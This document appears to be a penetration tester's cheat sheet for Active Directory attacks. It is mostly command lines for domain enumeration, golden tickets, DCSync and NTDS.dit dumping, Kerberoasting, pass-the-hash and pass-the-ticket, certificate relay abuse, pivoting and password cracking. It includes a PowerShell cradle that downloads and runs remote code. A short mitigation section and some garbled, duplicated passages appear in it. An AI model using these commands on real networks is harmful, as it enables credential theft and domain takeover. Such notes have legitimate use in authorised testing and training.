# Linuxarp -a
cat /etc/hosts
ifconfig
ip a
nmcli dev show
ip r
# Windowsarp -a
type c:\Windows\System32\drivers\etc\hosts
ipconfig /all
netstat -r
Access Domain Names
For a box that is not joined to the domain, but has domain access, add the DC (or DNS server) to resolve DNS names.
Split DNS Resolution (w/ VPN)
# 1. Enable dnsmasq plugin (Global Config)sudo cp /etc/NetworkManager/NetworkManager.conf /etc/NetworkManager/NetworkManager.conf.bak
sudo sed -i '/\[main\]/a dns=dnsmasq' /etc/NetworkManager/NetworkManager.conf
# 2. Create the Domain Rule (Persistent)# Syntax: server=/domain.com/10.10.10.10echo "server=/<FQDN>/<DNS_SERVER>" | sudo tee /etc/NetworkManager/dnsmasq.d/split_dns.conf
# 3. Restart NetworkManager to apply the plugin changesudo systemctl restart NetworkManager
# 4. Configure the VPN Connection# Replace <CONNECTION_NAME> with your VPN profile name (e.g., 'tun0' or 'lab_vpn')sudo nmcli connection modify "<CONNECTION_NAME>" ipv4.dns ""sudo nmcli connection modify "<CONNECTION_NAME>" ipv4.ignore-auto-dns yes
sudo nmcli connection modify "<CONNECTION_NAME>" ipv4.never-default yes
# 5. Reconnect VPNsudo nmcli connection down "<CONNECTION_NAME>"sudo nmcli connection up "<CONNECTION_NAME>"
All DNS Resolution (no Internet access)
# Configure the VPN connection to strictly use the Target DNSsudo nmcli connection modify "<CONNECTION_NAME>" ipv4.dns "<DNS_SERVER>"sudo nmcli connection modify "<CONNECTION_NAME>" ipv4.ignore-auto-dns yes
# Reconnect to applysudo nmcli connection down "<CONNECTION_NAME>"sudo nmcli connection up "<CONNECTION_NAME>"
NOTE: sometimes the outputed zipfile doesn’t get properly ingested… trying extracting and uploading the individual JSON files
BloodHound is THE TOOL for AD enumeration. “[L]everages graph theory to reveal hidden and often unintended relationships across identity and access management systems…” visually along with other pre-built queries to find weakness in domain structures.
# Basic Host Infowmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
# Basic Domain Infowmic ntdomain get Caption,Description,DnsForestName,DomainName,DomainControllerAddress
# Security Patcheswmic qfe get Caption,Description,HotFixID,InstalledOn
# Process Listwmic process list /format:list
# Domain and DC Infowmic ntdomain list /format:list
# Users on the Domainwmic useraccount list /format:list
# Local Groups Infowmic group list /format:list
# System Accounts Infowmic sysaccount list /format:list
net Version
These could be potentially heavily monitored. Try net1 instead of net will execute the same functions without the potential trigger from the net string.
# Information about password requirementsnet accounts
# Password and lockout policynet accounts /domain
# Information about domain groupsnet group /domain
# List users with domain admin privilegesnet group "Domain Admins" /domain
# List of PCs connected to the domainnet group "Domain Computers" /domain
# List PC accounts of domains controllersnet group "Domain Controllers" /domain
# User that belongs to the groupnet group <DOMAIN_GROUP> /domain
# List of domain groupsnet groups /domain
# All available groupsnet localgroup
# List users that belong to the administrators group inside the domainnet localgroup administrators /domain
# Information about a group (admins)net localgroup Administrators
# Add user to administratorsnet localgroup administrators <USER> /add
# Check current sharesnet share
# Get information about a user within the domainnet user /domain <USER>
# List all users of the domainnet user /domain
# Information about the current usernet user %username%
# Mount the share locallynet use Z: \\<TARGET>\<SHARE>
# Get a list of computersnet view
# Shares on the domainsnet view /all /domain[:<DOMAIN>]# List shares of a computernet view \\<TARGET> /ALL
# List of PCs of the domainnet view /domain
Native tool to find AD objects. Only exists on hosts installed with Active Directory Domain Services Role and at C:\Windows\System32\dsquery.dll.
# Query all users or computersdsquery user
dsquery computer
# Query filter for all users in a Domaindsquery * "CN=Users,DC=<DOMAIN>,DC=<TOPLEVEL_DOMAIN>"# Users With Specific Attributes Set (PASSWD_NOTREQD)# 1.2.840.113556.1.4.803:=32 means PASSWD_NOTREQD must be setdsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl
# Search DCs in Current Domaindsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
# Search disabled accountsdsquery * -filter "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=2)(adminCount=1)(description=*))" -limit 5 -attr SAMAccountName description
# Get Current PS Execution PolicyGet-ExecutionPolicy -List
# OverrideSet-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
Get-Module
Get-ExecutionPolicy -List
Set-ExecutionPolicy Bypass -Scope Process
Get-ChildItem Env: | ft Key,Value
Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
# Pull any other tools via HTTPpowershell -nop -c "iex(New-Object Net.WebClient).DownloadString('<DOWNLOAD_URL>');"
Domain Trusts
# Search for trusts (ADSI – no RSAT required)$root = [ADSI]"LDAP://RootDSE"$defaultNC = $root.defaultNamingContext.Value
$sysNC = "CN=System," + $defaultNC
$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$sysNC")
$searcher.Filter = "(objectClass=trustedDomain)"$searcher.PropertiesToLoad.Add("name") | Out-Null
$searcher.FindAll()
# Or use PowerViewImport-Module .\PowerView.ps1
Get-DomainTrust
Get-DomainTrustMapping
Get-DomainUser -Domain <DOMAIN> | select SamAccountName
netdom query /domain:<DOMAIN> trust
# Using netdom to query workstations and serversnetdom query /domain:<DOMAIN> workstation
This normally occurs when a privileged user is migrated from one domain to another, and there is no SID filtering in place.
The following are required to do this attack via Mimikatz:
child domain’s
KRBTGT hash
(Linux) or privileged user creds that can access the domain
SID
FQDN
name of a target user (does not need to exist!)
root domain’s
SID of the Enterprise Admins group
via Windows
# Obtaining the KRBTGT Account's NT Hash using Mimikatz and Domain SID.\mimikatz.exe 'lsadump::dcsync /user:<DOMAIN>\krbtgt'## REMEMBER: above this SID is for the user... but it contains the domain/group portion. Just cut off the number after the last '-' sectionImport-Module .\PowerView.ps1
Get-DomainSID
# Obtaining Enterprise Admins Group's SID using Get-DomainGroupGet-DomainGroup -Domain <DOMAIN> -Identity "Enterprise Admins" | select distinguishedname,objectsid
# BEFORE: Verify no ticketklist
ls \\<DC_FQDN>\c$
# Create GOLDEN TICKET# NOTE: the user matters only for logging.\mimikatz.exe 'kerberos::golden /ptt /user:<USER> /domain:<TARGET_DOMAIN> /sid:<TARGET_DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /sids:<TARGET_SID>'# AFTER: Verify ticket creation and no accessklist
ls \\<DC_FQDN>\c$
===# Rubeus method.\Rubeus.exe golden /rc4:<KRBTGT_HASH> /domain:<TARGET_DOMAIN> /sid:<TARGET_DOMAIN_SID> /sids:<TARGET_SID> /user:<USER> /ptt
# Then DCSYNC attack via Mimikatzlsadump::dcsync /user:<DOMAIN>\<USER> /domain:<TARGET_DOMAIN>
via Linux
Individually…
# Performing DCSync with secretsdump.pysecretsdump.py <DOMAIN>/<USER>:'<PASSWORD>'@<DC_IP> -just-dc-user <TARGET_DOMAIN>/krbtgt
# Domain SIDlookupsid.py <DOMAIN>/<USER>:'<PASSWORD>'@<DC_IP> | grep "Domain SID"# GOLDEN TICKET attackticketer.py -nthash <KRBTGT_HASH> -domain <TARGET_DOMAIN> -domain-sid <TARGET_DOMAIN_SID> -extra-sid <TARGET_SID> <USER>
export KRB5CCNAME="$(pwd)/<USER>.ccache"# !!! use something like psexec to access !!!
…or all-in-one script, but with GREAT CAUTION and UNDERSTANDING how this could negatively impact the target
# NOTE: will prompt for passwordraiseChild.py -target-exec <DC_IP> <TARGET_DOMAIN>/<USER>
# can use administrator hash from output to secretsdump.py for a user
ForceChangePassword - gives us the right to reset a user’s password without first knowing their password (should be used cautiously and typically best to consult our client before resetting passwords).
GenericWrite - gives us the right to write to any non-protected attribute on an object. If we have this access over a user, we could assign them an SPN and perform a Kerberoasting attack (which relies on the target account having a weak password set). Over a group means we could add ourselves or another security principal to a given group. Finally, if we have this access over a computer object, we could perform a resource-based constrained delegation attack which is outside the scope of this module.
AddSelf - shows security groups that a user can add themselves to.
GenericAll - this grants us full control over a target object. Again, depending on if this is granted over a user or group, we could modify group membership, force change a password, or perform a targeted Kerberoasting attack. If we have this access over a computer object and the Local Administrator Password Solution (LAPS) is in use in the environment, we can read the LAPS password and gain local admin access to the machine which may aid us in lateral movement or privilege escalation in the domain if we can obtain privileged controls or gain some sort of privileged access.
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2
Domain Misconfigurations
DNS Record Enumeration (adidnsdump)
Resolves hidden records in the DNS zone that standard enumeration misses.
# Dump all DNS records (Authenticated)adidnsdump -vr -u <DOMAIN>\<USER> -p <PASSWORD> ldap://<DC_IP>
# Resolve unknown records (A Query)adidnsdump -u <DOMAIN>\<USER> -p <PASSWORD> ldap://<DC_IP> -r
User Attributes Mining
Hunting for passwords in descriptions and weak account configurations.
Kerberoasting involves any valid domain user requesting a Ticket Granting Service (TGS) for an SPN. The TGS is encrypted with the service’s NTLM password hash, which if a human-readable password was set, can be cracked to reveal a password. The service is often times a local administrator. The key point is this technique must use password cracking to reveal the password; otherwise, only the TGS and an authorized user can access the service . Hence, an uncrackable password will prove fruitless.
One must have 1 of the following:
an account’s cleartext password or NTLM hash
a shell in the context of a domain user account (Kerberos ticket)
# Show Kerberoastable users.\Rubeus.exe kerberoast /nowrap
# Show Kerberoastable admins.\Rubeus.exe kerberoast /nowrap /ldapfilter:'admincount=1'# Kerberoast User# NOTE: /tgtdeleg attempts to force RC4 enc.\Rubeus.exe kerberoast /nowrap /tgtdeleg /user:<USER>
NOTE: This RC4 downgrade does not work against a Windows Server 2019 Domain Controller. It will always return a service ticket encrypted with the highest level of encryption supported by the target account
When Kerberos pre-authentication is disabled, an attacker can request encrypted authentication responses without needing the user’s password and later attempt offline password cracking.
Steals the Active Directory password database by using the built-in Directory Replication Service Remote Protocol, which is used by Domain Controllers to replicate domain data, allowing an attacker to mimic a DC to retrieve user NTLM password hashes.
REQUIRES: DS-Replication-Get-Changes or DS-Replication-Get-Changes-All Permission
# Specific userlsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\<USER>
# For KRBTGTlsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\krbtgt
# All users# WARNING: takes a long time... write output to a file!log dc_sync.txt
lsadump::dcsync /domain:<DOMAIN> /all
Manually via NTDS.dit
netexec essentially does the same thing here but remotely… so this should be a last resort method.
# Copy NTDS.dit# NOTE: hashes in NTDS are encrypted with DPAPI key in SYSTEMvssadmin list shadows
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<NUM>\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
# Download it and impacket-secretsdumpimpacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL
# Same as above but easiernetexec smb <TARGET> -u <ADMIN_USER> -p <PASSWORD> -M ntdsutil
Escalating and Pivoting
Pass the Key (PtK) / OverPass the Hash (OtH)
Concept: Request a Kerberos Ticket (TGT) using an NTLM hash or AES Key, rather than using the NTLM protocol directly.
# Spawns a process. Windows will implicitly request TGT using the injected key/hash when network resources are accessed.# Can use /ntlm, /aes128, or /aes256sekurlsa::pth /domain:<DOMAIN> /user:<USER> /aes256:<AES256_KEY> /run:cmd.exe
Option B: Rubeus (Request & Inject)
# Requests a TGT from the KDC and immediately injects it (/ptt)# Can use /rc4 (NTLM), /aes128, or /aes256.\Rubeus.exe asktgt /ptt /domain:<DOMAIN> /user:<USER> /aes256:<AES256_KEY>
Pass the Ticket (PtT)
Windows
Mimikatz
# 1. Export tickets from memory to .kirbi files.\mimikatz.exe "privilege::debug""sekurlsa::tickets /export" exit
# $ : machine tickets (computers)# @ : service tickets (users)# 2. Inject Ticket.\mimikatz.exe "kerberos::ptt <TICKET_FILE.kirbi>""misc::cmd" exit
Rubeus
# Enumerate tickets currently in session.\Rubeus.exe triage
# Export tickets to base64 (for copy-paste).\Rubeus.exe dump /nowrap
# Pass from File.\Rubeus.exe ptt /ticket:"<TICKET_FILE.kirbi>"# Pass from Base64 String.\Rubeus.exe ptt /ticket:"<BASE64_STRING>"# Convert File to Base64 (PowerShell Helper)[Convert]::ToBase64String([IO.File]::ReadAllBytes("<TICKET_FILE.kirbi>"))# Advanced: Extract & Pass John's ticket automatically (Regex One-Liner)$raw = .\Rubeus.exe dump /user:john /nowrap | Out-String
$ticket =[Regex]::Match($raw, "(?s)Base64EncodedTicket\s*:\s*(.*)").Groups[1].Value.Trim() -replace "\s", "".\Rubeus.exe ptt /ticket:$ticket
klist
# Backup current keytabcp -v $(echo $KRB5CCNAME | cut -d ':' -f 2) KEYTAB.BAK
# Use current keytabexport KRB5CCNAME=KEYTAB.BAK
# Enumerate AD information# https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/7/html/windows_integration_guide/cmd-realmdrealm list
# Check for ADgrep -i "sss\|winbind\|ldap" /etc/nsswitch.conf
ps -ef | grep -i "winbind\|sssd"env | grep -i krb5
# Find keytabssudo find / \( -iname '*keytab*' -o -iname '*.kt'\) -ls 2>/dev/null
# List cached Kerberos ticketsklist
# Backup current keytabcp -v $(echo $KRB5CCNAME | cut -d ':' -f 2) current.kt.bak
# Use current keytabexport KRB5CCNAME=$(pwd)/current.kt.bak
# Extract hashes from keytab files# https://github.com/sosdave/KeyTabExtractpython3 keytabextract.py <KEYTAB_FILE>
# Use keytab# NOTE: not all cached keytabs are validls -la /tmp/krb5cc*
cp -v <KEYTAB> $HOME/current.kt.bak
export KRB5CCNAME=$HOME/current.kt.bak
# Show keytabsklist
# Use keytabkinit -k '<NAME>'smbclient //<TARGET>/C$ -k -no-pass -c 'ls'
Double Hop Problem
There’s an issue known as the “Double Hop” problem that arises when an attacker attempts to use Kerberos authentication across two (or more) hops. The issue concerns how Kerberos tickets are granted for specific resources. Kerberos tickets should not be viewed as passwords. They are signed pieces of data from the KDC that state what resources an account can access (e.g. a computer but not beyond that computer). When we perform Kerberos authentication, we get a “ticket” that permits us to access the requested resource (i.e., a single machine). On the contrary, when we use a password to authenticate, that NTLM hash is stored in our session and can be used elsewhere without issue.
Enumeration of the Problem
Use these commands to confirm you are in a “Double Hop” / Network Logon state where delegation is failing.
Command
Output Indicator
Meaning
klist
Missing krbtgt/DOMAIN
You have no TGT. You cannot request tickets for other servers.
klist
Present HTTP/Hostname
You only have a service ticket for the current box.
mimikatz
Password : (null)
LSASS has no cached credentials for your session.
dir \\DC01\C$
Access is denied / Anonymous Logon
The target sees you as “Anonymous” because no creds were forwarded.
Requires Admin on the Jump Box. Sets up a permanent endpoint that auto-authenticates.
# 1. Register the Session (On Jump Box)Register-PSSessionConfiguration -Name "<SESSION_NAME>" -RunAsCredential "<DOMAIN>\<USER>" -Force
# 2. Connect to it (From Attack/Start Box)Enter-PSSession -ComputerName <MACHINE_NAME> -ConfigurationName "<SESSION_NAME>"# 3. Verifyklist # You should now see the krbtgt ticket
Best if you have a Hash or AES Key. Injects a TGT into your current session, “fixing” the double hop instantly.
# 1. Inject a TGT using the hash (or AES key).\Rubeus.exe asktgt /user:<USER> /domain:<DOMAIN> /rc4:<NTLM_HASH> /ptt
# 2. Verifyklist # You now have a krbtgt ticket# 3. Pivotls \\<DC_NAME>\C$ # Works natively now
Method 4: Mimikatz PtH (Legacy / Risky in WinRM)
Mimikatz usually spawns a new window (which fails in WinRM). You must force it to run a command in the same console.
# /run:powershell might hang WinRM depending on the shell stability.# Use Rubeus (Method 3) if possible.mimikatz.exe "sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:powershell" exit
Pass the Certificate (PtC)
Shadow Credentials Attack:
# https://specterops.io/blog/2021/06/17/shadow-credentials-abusing-key-trust-account-mapping-for-account-takeover/# https://github.com/ShutdownRepo/pywhisker.gitgit clone https://github.com/ShutdownRepo/pywhisker.git && cd pywhisker && pip3 install -r requirements.txt && cd pywhisker
# Get Certificate for userpython3 pywhisker.py --dc-ip <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --target <NEW_USER> --action add
# creates .pfx file of <NEW_USER> and PFX password
# Intercept web enrollment requests# https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py# NOTE: use https://github.com/ly4k/Certipy to find other templatespython3 -m venv venv
pip install git+https://github.com/fortra/impacket.git
hash -r
venv/bin/ntlmrelayx.py --adcs -smb2support --template KerberosAuthentication -t <WEB_ENROLL_SERVER>
# outputs *.pfx file# Force arbitrary auth from <TARGET> to <ATTACKER> via printers# e.g. DC => ATTACKER BOX# https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.pywget https://github.com/dirkjanm/krbrelayx/raw/refs/heads/master/printerbug.py
python3 printerbug.py <DOMAIN>/<USERNAME>:"<PASSWORD>"@<TARGET> <ATTACKER>
# PtC to get TGT# https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.pygit clone https://github.com/dirkjanm/PKINITtools.git ; cd PKINITtools ; python3 -m venv .venv ; source .venv/bin/activate ; pip3 install -r requirements.txt ; pip3 install -I git+https://github.com/wbond/oscrypto.git
# OPTIONAL: -pfx-pass from pywhisker.pypython3 gettgtpkinit.py -cert-pfx <PFX_FILE> -pfx-pass <PFX_PASS> -dc-ip <DC_IP> '<DOMAIN>/<USER>' <OUTPUT_TGT>
# gives <OUTPUT_TGT>---
# Configure Kerberosecho '<DC_IP> <DC_FQDN>' | sudo tee -a /etc/hosts
sudo cp -v /etc/krb5.conf /etc/krb5.conf.bak
echo '[libdefaults]
default_realm = <DOMAIN>
dns_lookup_kdc = false
[realms]
<DOMAIN> = {
kdc = <DC_FQDN>
}
[domain_realm]
.<DOMAIN_LOWER> = <DOMAIN_UPPER>
<DOMAIN_LOWER> = <DOMAIN_UPPER>
' | sudo tee /etc/krb5.conf
export KRB5CCNAME=<OUTPUT_TGT>
klist
# Get NTLM hash of DC Administratorimpacket-secretsdump -k -no-pass -dc-ip <DC_IP> -just-dc-user Administrator '<DOMAIN>/<DC_HOSTNAME>$'@<TARGET_FQDN>
# gives HASHevil-winrm ... -H <HASH>
Mitigation
Inventory
Naming conventions of OUs, computers, users, groups
DNS, network, and DHCP configurations
An intimate understanding of all GPOs and the objects that they are applied to
Assignment of FSMO roles
Full and current application inventory
A list of all enterprise hosts and their location
Any trust relationships we have with other domains or outside entities
Users who have elevated permissions
Prevention
Technology
Run tools such as 5d, PingCastle, and Grouper periodically to identify AD misconfigurations.
Ensure that administrators are not storing passwords in the AD account description field.
Review SYSVOL for scripts containing passwords and other sensitive data.
Avoid the use of “normal” service accounts, utilizing Group Managed (gMSA) and Managed Service Accounts (MSA) where ever possible to mitigate the risk of Kerberoasting.
Prevent direct access to Domain Controllers through the use of hardened jump hosts.
Consider setting the ms-DS-MachineAccountQuota attribute to 0, which disallows users from adding machine accounts and can prevent several attacks such as the noPac attack and Resource-Based Constrained Delegation (RBCD)
Disable the print spooler service wherever possible to prevent several attacks
Disable NTLM authentication for Domain Controllers if possible
Use Extended Protection for Authentication along with enabling Require SSL only to allow HTTPS connections for the Certificate Authority Web Enrollment and Certificate Enrollment Web Service services
Enable SMB signing and LDAP signing
Take steps to prevent enumeration with tools like BloodHound
Ideally, perform quarterly penetration tests/AD security assessments, but if budget constraints exist, these should be performed annually at the very least.
Test backups for validity and review/practice disaster recovery plans.
Enable the restriction of anonymous access and prevent null session enumeration by setting the RestrictNullSessAccess registry key to 1 to restrict null session access to unauthenticated users.
People
The organization should have a strong password policy, with a password filter that disallows the use of common words (i.e., welcome, password, names of months/days/seasons, and the company name). If possible, an enterprise password manager should be used to assist users with choosing and using complex passwords.
Rotate passwords periodically for all service accounts.
Disallow local administrator access on user workstations unless a specific business need exists.
Disable the default RID-500 local admin account and create a new admin account for administration subject to LAPS password rotation.
Implement split tiers of administration for administrative users. Too often, during an assessment, you will gain access to Domain Administrator credentials on a computer that an administrator uses for all work activities.
Clean up privileged groups. Does the organization need 50+ Domain/Enterprise Admins? Restrict group membership in highly privileged groups to only those users who require this access to perform their day-to-day system administrator duties.
Disable Kerberos delegation for administrative accounts (the Protected Users group may not do this)
Where appropriate, place accounts in the Protected Users group.
Role: Generates a “Health Check” report based on a maturity model. Bridges the gap between technical findings and C-Level risk scores.
OPSEC: Moderate. Generates significant LDAP traffic but looks like admin activity.
# Interactive Mode (Best for first run)
PingCastle.exe
# Healthcheck Report (Non-Interactive)
# Generates an HTML report in the current directory
PingCastle.exe --healthcheck --server <DC_FQDN>
# Scan specific risk areas (Scanner Mode)
# Options: aclcheck, antivirus, localadmin, laps_bitlocker, etc.
PingCastle.exe --scanner aclcheck
Active Directory Explorer (Sysinternals)
Role: Creates (and mounts) snapshots of the AD Database for offline analysis.
Attack Vector: If you find .dat snapshot files on shares, you can mount them to browse AD as it was at that time without alerting the DC.
# Create a Snapshot (Requires Creds)
# -snapshot: Create a snapshot
# "" : Prompt for password
ADExplorer.exe -snapshot "" <DC_FQDN> output_filename
# Mount a Snapshot (Offline Analysis)
# Allows you to browse a .dat file found on a share
ADExplorer.exe -snapshot "" <PATH_TO_DAT_FILE>
Group3r
Role: Deep-dive auditing of Group Policy Objects (GPOs). Unlike standard tools that check permissions, this parses the content of GPOs to find hardcoded passwords, local admin deployments, and script definitions.
# Basic Scan (Output to Console)
group3r.exe -s
# Full Scan (Output to File)
# -f: Output file path
group3r.exe -f results.log
ADRecon
Role: Extracts everything from the domain (Users, Computers, GPOs, DNS, LAPS, BitLocker) and compiles it into a massive Excel report.
OPSEC: 💀 EXTREMELY LOUD. Do not use during a Red Team engagement unless you have burned the environment or are simulating an “Ignorant Insider.”
# Run Audit (Requires Excel installed for pretty reports, otherwise CSV).\ADRecon.ps1
# Run on specific target Domain Controller.\ADRecon.ps1 -DomainController <DC_IP>
# Generate Excel report from CSVs (Run offline on analyst machine).\ADRecon.ps1 -GenExcel <PATH_TO_CSV_FOLDER>
# Linuxarp -a
cat /etc/hosts
ifconfig
ip a
nmcli dev show
ip r
# Windowsarp -a
type c:\Windows\System32\drivers\etc\hosts
ipconfig /all
netstat -r
Access Domain Names
For a box that is not joined to the domain, but has domain access, add the DC (or DNS server) to resolve DNS names.
Split DNS Resolution (w/ VPN)
# 1. Enable dnsmasq plugin (Global Config)sudo cp /etc/NetworkManager/NetworkManager.conf /etc/NetworkManager/NetworkManager.conf.bak
sudo sed -i '/\[main\]/a dns=dnsmasq' /etc/NetworkManager/NetworkManager.conf
# 2. Create the Domain Rule (Persistent)# Syntax: server=/domain.com/10.10.10.10echo "server=/<FQDN>/<DNS_SERVER>" | sudo tee /etc/NetworkManager/dnsmasq.d/split_dns.conf
# 3. Restart NetworkManager to apply the plugin changesudo systemctl restart NetworkManager
# 4. Configure the VPN Connection# Replace <CONNECTION_NAME> with your VPN profile name (e.g., 'tun0' or 'lab_vpn')sudo nmcli connection modify "<CONNECTION_NAME>" ipv4.dns ""sudo nmcli connection modify "<CONNECTION_NAME>" ipv4.ignore-auto-dns yes
sudo nmcli connection modify "<CONNECTION_NAME>" ipv4.never-default yes
# 5. Reconnect VPNsudo nmcli connection down "<CONNECTION_NAME>"sudo nmcli connection up "<CONNECTION_NAME>"
All DNS Resolution (no Internet access)
# Configure the VPN connection to strictly use the Target DNSsudo nmcli connection modify "<CONNECTION_NAME>" ipv4.dns "<DNS_SERVER>"sudo nmcli connection modify "<CONNECTION_NAME>" ipv4.ignore-auto-dns yes
# Reconnect to applysudo nmcli connection down "<CONNECTION_NAME>"sudo nmcli connection up "<CONNECTION_NAME>"
# ATTACKER => REDIR => TARGET# NOTE: add "-L 0.0.0.0" to make the local port accessible from other machines next to ATTACKER (like a Windows box)portfwd add -l <ATTACKER_PORT> -r <TARGET_IP> -p <TARGET_PORT>
Remember that only proper TCP traffic works with SOCKS (e.g. NOT certain scans like nmap -sS sends malformed packets or ICMP ping), use nmap -sT --proxy
# Set global proxy for Metasploitsetg PROXIES socks5:127.0.0.1:1080 # SOCKS5setg PROXIES HTTP:127.0.0.1:8080 # HTTP# Clear proxy for current module onlyset Proxies ""# Accept reverse connections directly (don't let it thru the SOCKS proxy)setg ReverseAllowProxy true
via SSH
# Step 1: create proxy via SSHssh -D 9050 <USER>@<TARGET>
# Step 1: Run MSF SOCKS proxyuse auxiliary/server/socks_proxy
set SRVPORT 9050set SRVHOST 0.0.0.0
set version 4a
#set version 5run -j
jobs
# Step 2a: in MSFuse post/multi/manage/autoroute
set SESSION <SESSION>
set SUBNET <TARGET_SUBNET>
run -j
jobs
route print
# OR Step 2b: in MSF sessionrun autoroute -s <TARGET_SUBNET>
run autoroute -p
Sshuttle
“Transparent proxy server that works as a poor man’s VPN. Forwards over ssh. Doesn’t require admin… Supports DNS tunneling.”
Prefer nth (Name That Hash) over hashid: it outputs the exact Hashcat -m and John format so you can paste and run. Hashcat can also suggest a mode if you run it without -m.
# Name That Hash (recommended)pipx install name-that-hash
nth -t '<HASH_STRING>'nth -f <HASH_FILE.txt>
# Hashcat autodetect (no -m; it will suggest or prompt)echo '<HASH>' > detect.hash
hashcat detect.hash --show
# orhashcat detect.hash <WORDLIST>
Ambiguity: e.g. 32-char hex can be MD5 or NTLM — context (source) matters. Don’t truncate == or leading $ when copying.
Extraction/Format Conversion
File to Hash
Convert files/artefacts to a hash format that hashcat or John can crack.
# Find all JtR utilitiessudo updatedb && locate '*2john' | grep -v 'pycache'# Zip (then crack: hashcat -m 17200 for PKZIP, or JtR for zips)zip2john <ZIP_FILE> > hash_zip.txt
# RARrar2john <RAR_FILE> > hash_rar.txt
# Office docsoffice2john <OFFICE_FILE> > hash_office.txt
# PDFpdf2john <PDF_FILE> > hash_pdf.txt
# Bitlockerbitlocker2john -i <VHD_FILE> > pre_hash_vhd.txt
grep "bitlocker\$0" pre_hash_vhd.txt > hash_crackme_vhd.txt
hashcat -a 0 -m 22100 hash_crackme_vhd.txt <WORDLIST>
# Mount with Bitlocker (after cracking)sudo apt install -y dislocker
sudo mkdir -p /media/{bitlocker,bitlockermount}sudo losetup -f -P Backup.vhd
ls -la /dev/loop*
sudo dislocker /dev/<LOOP_DEV> -u<PASSWORD> -- /media/bitlocker
sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount
# SSH: find private keysgrep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/null
# Check if key is password protectedssh-keygen -yf <PRIVKEY>
# Get hashssh2john <PRIVKEY> > ssh.hash
# OpenSSL-encrypted archivewhile read p; do openssl enc -aes-256-cbc -d -in <ENC_FILE> -k "$p" 2>/dev/null | tar xz 2>/dev/null
if[ $? -eq 0]; then echo "Success! Password is: $p" break
fidone < <WORDLIST>
# Manually generate keywords or use cewl via OSINTcat << EOF > keywords.txt
<KEYWORDS>
EOF# Rule examples: c (Capitalize first), C (lowercase first, rest upper), t (toggle case)# $! append ! ; $1$9$9$8 append 1998 ; sa@ replace a with @ ; so0 replace o with 0 ; ss$ replace s with $cat << EOF > custom.rule
c
C
t \$!
\$1\$9\$9\$8
\$1\$9\$9\$8\$!
sa@
so0
ss\$
EOF# Generate permutated wordlisthashcat --force -r custom.rule keywords.txt --stdout | sort -u > wordlist.txt
# Crack with same ruleshashcat -a 0 -m <HASH_ID> -r custom.rule <HASH> wordlist.txt
CUPP Profiling
Build a targeted wordlist from personal information (name, birthday, pet, company, etc.). Use when you have OSINT on the target and want passwords likely derived from that data.
git clone https://github.com/Mebus/cupp.git
cd cupp
python3 cupp.py -i
Interactive prompts: name, surname, nickname, birthday, partner, pet, company, keywords, etc. Output is a wordlist tailored to the target.
Cracking
Hash Identification
See §0. Hash identification above. Fallback: hashid -jm '<HASH>'.
